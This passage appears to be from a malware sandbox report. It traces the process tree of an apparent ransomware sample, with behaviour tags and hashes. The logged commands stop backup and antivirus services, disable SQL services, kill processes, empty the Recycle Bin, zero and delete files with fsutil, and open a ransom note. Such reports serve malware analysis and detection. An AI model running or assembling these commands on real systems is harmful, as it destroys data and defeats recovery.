PID:2064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
- System Location Discovery: System Language Discovery
PID:5128
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
- System Location Discovery: System Language Discovery
PID:3188 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:3436
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
- System Location Discovery: System Language Discovery
PID:4568 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
- System Location Discovery: System Language Discovery
PID:4280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
- System Location Discovery: System Language Discovery
PID:5344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:2940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:1468
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:4944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
- System Location Discovery: System Language Discovery
PID:5152
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:2068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
- System Location Discovery: System Language Discovery
PID:5184
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:1804 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5252
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
- System Location Discovery: System Language Discovery
PID:1776
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:4576 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5336
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
- System Location Discovery: System Language Discovery
PID:2640 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:5232
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
- System Location Discovery: System Language Discovery
PID:4008 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:5164
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
- System Location Discovery: System Language Discovery
PID:1088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
- System Location Discovery: System Language Discovery
PID:5144
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:1796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:5368
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
- System Location Discovery: System Language Discovery
PID:3492 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
- System Location Discovery: System Language Discovery
PID:1644
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:2032
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
- System Location Discovery: System Language Discovery
PID:5064
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
- System Location Discovery: System Language Discovery
PID:5192
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
- System Location Discovery: System Language Discovery
PID:1180 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:5224
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
- System Location Discovery: System Language Discovery
PID:1912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
- System Location Discovery: System Language Discovery
PID:5216
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:1740
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
- System Location Discovery: System Language Discovery
PID:5300
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:1044
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
- System Location Discovery: System Language Discovery
PID:5284
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:1448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5292
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:3572
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5328
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
- System Location Discovery: System Language Discovery
PID:1916 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵
- System Location Discovery: System Language Discovery
PID:5172
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3280
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4464
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1416
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
- System Location Discovery: System Language Discovery
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpBA86.bat2⤵
- System Location Discovery: System Language Discovery
PID:5792
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1144
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2644 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5552
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
- System Location Discovery: System Language Discovery
PID:1576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵
- System Location Discovery: System Language Discovery
PID:1988 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
- System Location Discovery: System Language Discovery
PID:3452
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d288f7995f1f202ddca9ac198bb9e1c6
SHA18444090d009c423e4affe7e18ad1fd9a083329f4
SHA2565f58487fe74e3942b2eb3332aaad5b555448cb7182b4d8f87e1ba917e241b861
SHA5128a8a8da0c1018bc330febb066467bfcb4da4a115dc1c6f9cc0fefac74ac59bb7a95f3b3c5be375ea04d338a5c005a1b6947e19a8e11a5b00698fa28102302d7a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82